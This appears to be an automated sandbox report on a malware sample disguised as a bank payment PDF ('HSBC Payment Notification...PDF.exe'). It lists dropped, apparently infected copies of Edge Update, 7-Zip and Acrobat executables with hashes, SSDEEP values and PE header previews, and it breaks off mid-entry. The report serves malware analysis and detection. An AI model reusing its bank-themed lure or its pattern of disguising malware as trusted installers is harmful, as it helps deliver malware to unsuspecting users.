Entropy (8bit):	7.159902930905242
Encrypted:	false
SSDEEP:	24576:awNHwoYhua6MZERO4qbBJTY6mY1uIgx/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:awNPdNO7BJTfmE2LNiXicJFFRGNzj3
MD5:	2BCA2411B0BB54EF4E52CC53E0254070
SHA1:	2F82079715774CD9CC1B5A4BBAF1AF8B85A464AA
SHA-256:	9AF02BB798ED25A0FFAF21555D0EBDE3D4D8F3F50FD6BE471D3E50C4C13AC4BE
SHA-512:	72F2C5848D09B2D4CF404C9F3B3EE10E8ED6BCEFB547B739588A83712DD9EA8C62EE600AC1F50608CDF64DE43CE30252FC721EAF8A61EEEC17B724CA6EA92B15
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".........r......P..........@.....................................t.... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(......................... ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............\|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1481216
Entropy (8bit):	4.694121737470346
Encrypted:	false
SSDEEP:	24576:66lbht6BHi/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:llNtqHiLNiXicJFFRGNzj3
MD5:	229A8BD09A7183991DA1B8E95AD9AEAB
SHA1:	5398306E8635841045E62C7496FF3C00FFB17786
SHA-256:	B641F1B3F39520D1891CF32EE2CCB3D54F738BD540547471BEE51365F59B2540
SHA-512:	6FFD7E628236BF69BBC237A7DBEFAEE1FFA496BC7DC799BE4E832C3E1883A6CF1D20A769B839D9F79DC7BF472EC8B1AA720264E61167ABF3978960559FB2E062
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...c..?....c..+c..Xc......)c.....c..+c..\|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@...........................!.....}2......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...p...0......................@...........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1376768
Entropy (8bit):	4.656842446037766
Encrypted:	false
SSDEEP:	24576:nIxkTBV2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Ixk1V2LNiXicJFFRGNzj3
MD5:	C193A115CA81E5DE0AB2FB9368AE5375
SHA1:	815BD8B87663C328B88C94647E719050A59D19FF
SHA-256:	2A5772B1FF97ABC3A5ECD3FA6C27224183309CDCB2ED4B92A345CF800AE8BD6F
SHA-512:	B0E8F7AE080319B404C39888C443F97059CC3414772BA0E3DCF4C8CD796698E58E1F793BC3B2143BA433FBF564967AF481AB28E0102C142A0CE3A6551B6A199D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@........................... .............................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1490944
Entropy (8bit):	4.787377262113072
Encrypted:	false
SSDEEP:	24576:XcssmrH/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Mb8LNiXicJFFRGNzj3
MD5:	5B0C1AD79C0FDBA173877D262B78A25F
SHA1:	2DBC13FCA65768E5055854B14A687E113E235654
SHA-256:	7760FEE1280A178AB791F292E7B22DEEC82FDFA6B96E34E3E4E0FEFD8A81BF2C
SHA-512:	E85F12910FFC7EEB8D2FD5617453F995AD5F34CEAD59AFEBC332276FA854D2681D70860330878D8D7932CEF5F8318FF815F5D0F46B3AC5A03E6E474A505B04E2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A\|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@..............................!........... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......\|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...`........... ..............@...........................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1539584
Entropy (8bit):	4.896552046543266
Encrypted:	false
SSDEEP:	24576:NTfcT++foSBWU2Yxhkgg/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:JfcK+foQWU2YnPgLNiXicJFFRGNzj3
MD5:	CCB28A17917F79F3B737456EB42ED66B
SHA1:	69425BAB7A4F89C97E2E7D509921094309E80810
SHA-256:	0EE84247B9B2B1F3EEB9910BD4E5F6BA0CC245940132F94C50F4E0A393CFD209
SHA-512:	F06E23F38D379EDF25441ACD3E9D10E4B00BE295874E397AE7868AEF1BB6B43B29D4ED91C4F459487FF3C9334E561A4591C35A17D8238AC881458FDA2BFDD8B9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@...........................".............................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......\|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1376768
Entropy (8bit):	4.656894883027871
Encrypted:	false
SSDEEP:	24576:LbBRzBgA/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:fBRVgALNiXicJFFRGNzj3
MD5:	9AB63D6E95022399D4D6330981838864
SHA1:	AE0B8003ACA781A9BE875388BDD0261885DCD1A1
SHA-256:	9DDB31A43869EDC524A0E10871D2A79B80DF150B3907A1569241FF46EA5AFF90
SHA-512:	D42F5796A06638121654E4703D4BAF31ADE9218B27B9EB49E3E0356BD57C407FE8E1B061BD45B4053C2962DEA671BEAE5AF8BC8A9B5E08C15E9F6D54DE95F23B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@........................... ......s..........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...p...........R..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2168832
Entropy (8bit):	7.93763430496732
Encrypted:	false
SSDEEP:	49152:Fy53w24gQu3TPZ2psFkiSqwozeLNiXicJFFRGNzj3:FyFQgZqsFki+oze7wRGpj3
MD5:	F4C808D86EBBF9974CAA0782C6F59770
SHA1:	2B75E6F4D5C4FB5590684A3320D2ED6E5C312898
SHA-256:	00FBBA5DA3AEFA12416C6273550E7E1FD567012FD834D9246644A2734D5E1462
SHA-512:	673865154E9F86FDE1F41E28A40B4EC894A900BC46D2E4FE2A706E5D0C5F7466B7B19B9451D758E451FDACBC7C48C5489301961E7488DB24818FF8A679B8FD65
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.....L.!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Download File

Process:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3141
Entropy (8bit):	4.897008780995357
Encrypted:	false
SSDEEP:	24:lBdwhrAJU4QqRzcWtF1cWmIF91XGeu4ScWqFbvoxcWlbFcW07F8YnYcWqNFwH45A:zcaRn9m008wx3XqkArnQD
MD5:	DD7DEBEB20304F76B1147A84A07B5D92
SHA1:	1827B17094FCFE9DFAE85E44884EF12EFAA93789
SHA-256:	29CDEC4C35F0817EE82E6C090699DED0BA3FAAB6E707E231946D0BB1532B4619
SHA-512:	C04BDEFB90D60BAAB3E7314B684CB13AB8F054754E52CC62F1B0711775A7915C546498E40D126EF5D42304DAE992A9CBF7F0DC94BA9B79499D2B9051D2BCE2EE
Malicious:	false
Preview:	2024-12-13 09:47:20-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-13 09:47:20-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-13 09:47:20-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-13 09:47:20-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-13 09:47:20-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-13 09:47:20-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-13 09:47:20-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-13 09:47:20-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-13 09:47:20-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-13 09:47:20-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-13 09:47:20-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-13 09:47:2

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Download File

Process:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1512448
Entropy (8bit):	4.897871666670363
Encrypted:	false
SSDEEP:	24576:xQVTZu0Jd/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:yVTZuYLNiXicJFFRGNzj3
MD5:	63C13938F9E801F48994A09AA63E6195
SHA1:	A45233372F1AE1A60458D899FB39B349EF047890
SHA-256:	E18E1728F8462E29D7B42BD845E69605150D149C1BFB36A1B2362BB9409BB4AD
SHA-512:	A89F1ED849CD9EDDE73760EFD130183F1FB02337E5D6AFE29763A312127D0CB9254076F8F4F560C7DD202313AD3F9239FC3367443FADB8B44141577779FD3FA7
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................`".....Q_.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...`...........t..............@...........................................................................................................................................................................................................................

C:\Program Files\7-Zip\7z.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1839616
Entropy (8bit):	5.24599732949439
Encrypted:	false
SSDEEP:	24576:y+gkEdfh4Coo/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3gkE5SCLNiXicJFFRGNzj3
MD5:	D8B4CB7B33B8F30D067916595CA75AA6
SHA1:	96A2590825BE3038E1EEBD38989BDD7D40201764
SHA-256:	393D476ED38C3E1142D73D92DDD5324F4D8FE4BE5FFFEC8ABAE3210C5109A27B
SHA-512:	A465CB29654719884A9C752E7F9B31ADC3AA1BA216F8B85A57B81EC18B34542492FBB1514C764F617746282ED64762B90CBEE52195852D2FFE424562C19918C6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@..............................0'.....^y.... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...`...........r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zFM.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1532416
Entropy (8bit):	7.089477256669137
Encrypted:	false
SSDEEP:	24576:nBpDRmi78gkPXlyo0Ghjrz/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:BNRmi78gkPX4o0GhjnLNiXicJFFRGNzb
MD5:	97179DC6DAC1EBE2302758AB1B780272
SHA1:	3129D292FB494E0A89DB8A70814F0A78598239FF
SHA-256:	68F1C3E9A9C8817F723ABAE29FB7A9B1B00996AF2134C451B0203F6411EC0CEF
SHA-512:	04FA29BFFEEC6013439E94DF3459C4B18C2081535DCDE9A96359A95F8D1E5D07E4C0DC272D80518D3C2107CDC564376E939D4EE12D0E3004F03E340907C4D257
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@........................................... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\7zG.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	7.220013785025342
Encrypted:	false
SSDEEP:	24576:bLOS2oPPIXVo/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:F/PvLNiXicJFFRGNzj3
MD5:	AC85FD45FEF54D364B7362B6271E4A15
SHA1:	88D771BD1E8BE9247DEB7F1A0637B8551F7A3DE3
SHA-256:	00559662848AD97DA30EF795BC28E4E8A5BE977657454C76B21F1CE2BDB6F555
SHA-512:	11CC83870EAC72A96EF1FB1B1BA03035916E0575D7E734B1FCC19509AB2C0E859FE87EF4499ABD1922224E9C96FB04BC00D798D63E2DC53044BEE7215C4D0852
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@......................................~.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................

C:\Program Files\7-Zip\Uninstall.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1300992
Entropy (8bit):	4.528899804075217
Encrypted:	false
SSDEEP:	24576:cYi/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:cLNiXicJFFRGNzj3
MD5:	671C85E455013ED3E2969C9A65F214F2
SHA1:	9ED58BF4A4B67C9450C36447914C7F0E79A50317
SHA-256:	854AF189A20E5F706071E4249C35C803C1AEF31D671AEF3E75911FC91F0E6975
SHA-512:	455A24530E11A18749A7EC24160A27169DCDDFF2AC10B034636DB8586937B029753892A9DF3881DB3BB96EAA59959CA627465798AB1537FA261DC2AB71FAD7AD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....p...`.......*..............@...........................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1222656
Entropy (8bit):	6.69883441213364
Encrypted:	false
SSDEEP:	24576:stdzl/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:stdpLNiXicJFFRGNzj3
MD5:	697590304584CE92566CF2D3C1801F77
SHA1:	3738DB128DB5FB72B8D5FDB1B164F4AD51272711
SHA-256:	604FD341B2D3F46D4C3F934BCD3AC6726057ACCBF52DC22E5F8B4731773BAA2E
SHA-512:	C3F3A232502A07B07CD74988D950F409253EB3342C3AEF82E4CCBF194FAE75AF506B672DF37E7CD1E424DCC8F7A2712EDFEED61FB3BDF79E25B3F8357E3F0518
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................~O.... .....................................................\|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1613312
Entropy (8bit):	4.6765821040392055
Encrypted:	false
SSDEEP:	12288:JvNiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:P/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	BFBE13A566F1DBD676322BFDECADFF95
SHA1:	33727D7EBE0B9111A376E2D468296EAA96051B09
SHA-256:	6675E34BE28F3AB1962A2258C815D6D2A89ED1ABF04080D5B5FD7BCBD2040F11
SHA-512:	5CF858FE596DCF02F40A06FBF0B6BE8F70A561B6F87F14FF9CA4DEC3DB421D3EDA01B6B8357EAF1879A7200765C4A0F1A7AEF3E5CDBD6F213B805BD85DB76225
Malicious:	true
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...\|...\|...\|B..}...\|B..}...\|...}...\|..S\|...\|..}=..\|..}...\|..}...\|..}...\|..=\|...\|o..\|...\|B..}...\|...\|...\|..}...\|..Q\|...\|..9\|...\|..}...\|Rich...\|................PE..d......d.........."......H...........&.........@..............................#.....bi.... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...`...P......................@...................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1616896
Entropy (8bit):	5.043535468065994
Encrypted:	false
SSDEEP:	24576:25zhM1XSFs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:sMs+LNiXicJFFRGNzj3
MD5:	891797B3E49D035646A8FD03C926D8C6
SHA1:	259CF68A54788AC315BD6E2AD6C4DF3465960DE2
SHA-256:	FA9F7070163E8BA248CA0156AC58FE1219A84448E6D1D622F93CFB95D5564170
SHA-512:	0838D97F95B07F164A5E49BDB7666D22AB88CC9E1D90C6E0633ED7A55184BB1A4E4BE6DBB4D4CFD4A176D48A0EB10674AC99972F2CE8F8BDF3A25EE4A724B7A5
Malicious:	true
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@..............................#........... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...`...0......................@...........................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4151808
Entropy (8bit):	6.4967612566296085
Encrypted:	false
SSDEEP:	49152:jtuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN755rLNiXico:jjEIa3HIEWOc5p7wRGpj3
MD5:	18086CD93ADC0D921B8B06680EC30C5E
SHA1:	FE68C64E0669F29B9BFDF81C7C7E2A0E28A84FD8
SHA-256:	2FCFFA04FCCB8FCD1948978081B2BCA0EF3D6D1B0A6FD32C37FD639F2B798232
SHA-512:	5BBBAA9E0575FDDD5F266BF167B53BD5F464B1C33B77CD125BA71C9690B3AAE4093473AF38CFBA9C44735691534E46C0B3A4C22C34E9124E26B1BBCFA1BC9D38
Malicious:	true
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.....O.?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	59941376
Entropy (8bit):	7.9993539051129545
Encrypted:	true
SSDEEP:	1572864:RQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:CXhwMhe6AABPiQwF6xQ22R
MD5:	EF91C1D70143FD8BAA4EF6B0C16A655A
SHA1:	C3B098637AB1C8F3E8B5803E8545706A4CF9F78E
SHA-256:	3F17152425D643AD04880E18E2F29616F55D81BEFCADC137C3016A0ECB0045DA
SHA-512:	825D58A2DF357E9FF18FB45AE5A3F27C8A307B17FE3F5948EEE27C878FB4AA349F75AD363BBABF10E23D4D0576E816F8FE7227711348A808905624684A2BCFD6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;......J...J...Jk.Kt..Jk.Kl..Jk.K..J..Kn..J..Ku..J..K+..Jk.Kt..J...J..J..Kf..J..Kt..J..@J~..J..(J}..J..K~..JRich...J................PE..d...z..d..........".................3.........@.............................0......H7.... .....................................................x....`.........06..................8%..T....................&..(...Pg..8............ ......@...@....................text............................... ..`.rdata...}... ...~..................@..@.data...TS..........................@....pdata..06.......8..................@..@.didat..x....@......................@..._RDATA.......P......................@..@.rsrc.......`.....................@..@.reloc.......@.....................@...................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1335808
Entropy (8bit):	4.592594433743539
Encrypted:	false
SSDEEP:	12288:8W0iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:8z/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	E44A00FACAAB07ED6FE9A99382AF0E70
SHA1:	6FB0B3C779E9985970C32EC6E3648FEFF3F19DC1
SHA-256:	DA679DE805FD34236393C95935FED80205A080677E82B16B53EE63DAFE7CB793
SHA-512:	8C5618C25D2D426956E27386430A24E198F79BA1E0EC6B13C174AD2FD0C4AA5ACEF413F214AF6B88DB07E66D7AAD53408E43CBFB9F1251C37B451D960DBD3C66
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........e....b..b..b.\|...b.epf..b.epa..b.epg..b.epc..b.oc..b..c.2.b.gpg..b.gp...b.....b.gp`..b.Rich..b.................PE..d...R..d.........."......l...Z.......m.........@.............................P.......R.... .....................................................\|.......p.......@.......................T.......................(.......8............................................text...>k.......l.................. ..`.rdata..J:.......<...p..............@..@.data...............................@....pdata..@...........................@..@.rsrc...p...........................@..@.reloc...`..........................@...................................................................................................................................................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6210048
Entropy (8bit):	6.384606009297087
Encrypted:	false
SSDEEP:	49152:ADvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTXX:ZnN9KfxLk6GEQTXsUKzNDq7wRGpj3
MD5:	333796400C8CB18EE4E2CE0376875747
SHA1:	B1EE8FDCAC6EF2181BE8DF329AF6E20BFBA4289E
SHA-256:	59ABF928D4AC9B745C93F4CF88DAD96C4800A146ED6A082A1466CBDEF01224DF
SHA-512:	2C36A8EC32D91309502D7A4BAC522D845E6BC257D3AD7A9A485136A420602F58B1E56D829B8FC1FE279A02A9568260338C53F06BF364EF92C4728F2C3A2E144E
Malicious:	true
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......;..j...9...9...9k..8r..9k..8...9...8l..9...8t..9..p9\|..9...9...9...8...9k..8\..9k..8}..9k..8n..9...9...9...8Y..9...8~..9..r9~..9...9\|..9...8~..9Rich...9........................PE..d......d.........."......V4..,"......L(........@.............................._.....Q._... ..........................................<F.\|....EF.x....0K..V...@H......................n;.T....................o;.(....:.8............p4..... .F.`....................text...,T4......V4................. ..`.rdata..@....p4......Z4.............@..@.data...l.....F......nF.............@....pdata.......@H......vG.............@..@.didat.. .....K......>J.............@..._RDATA....... K......HJ.............@..@.rsrc....V...0K..X...JJ.............@..@.reloc...0....V.. ....U.............@...................................................................................................................

C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1312768
Entropy (8bit):	4.543813086176716
Encrypted:	false
SSDEEP:	12288:KiiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Kk/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	D2D1A26553856E563EB75D6C2351F2BD
SHA1:	099D6F22C107AAC154DEEBC016652DF80EE1EA81
